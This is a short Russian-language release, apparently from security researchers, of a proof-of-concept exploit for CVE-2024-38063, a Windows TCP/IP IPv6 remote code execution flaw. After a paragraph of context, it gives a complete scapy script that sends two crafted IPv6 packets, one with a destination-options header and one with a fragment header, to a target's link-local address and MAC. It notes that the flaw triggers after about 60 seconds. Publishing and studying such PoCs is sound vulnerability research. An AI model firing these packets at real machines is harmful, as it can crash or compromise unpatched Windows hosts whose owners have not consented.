
Доказательство концепции эксплуатации для CVE-2024-38063 — уязвимости удалённого выполнения кода в Windows TCP/IP, которая срабатывает при отправке двух специально сформированных IPv6-пакетов с опциями назначения и фрагментированными заголовками.
В августе 2024 года Microsoft выпустила патч для уязвимости удалённого выполнения кода (RCE) в Windows TCP/IP. Некоторые исследователи уже опубликовали Proofs of Concept (PoC) для этой уязвимости, и примерно в то же время исследователи PatchPoint также завершили свой анализ и воспроизведение данной проблемы. Из-за распространения дезинформации на различных платформах, включая Twitter, похоже, что ключевые моменты, необходимые для эксплуатации этой уязвимости, были поняты неправильно. Вопреки этим неточностям, мы решили выпустить PoC, демонстрирующий, как эту уязвимость можно проэксплуатировать с помощью передачи всего двух пакетов. В действительности, для эксплуатации этой уязвимости не требуется большого количества пакетов.
from scapy.all import *
IPAddr = '' # fe80::XXXX:XXXX:XXXX:XXXX
MACAddr = '' # XX:XX:XX:XX:XX:XX
ExtHdrDestOpt = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0xC2)])
ExtHdrFragment = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrFragment()
sendp([ExtHdrDestOpt, ExtHdrFragment], verbose=False)

※ Для срабатывания уязвимости требуется подождать примерно 60 секунд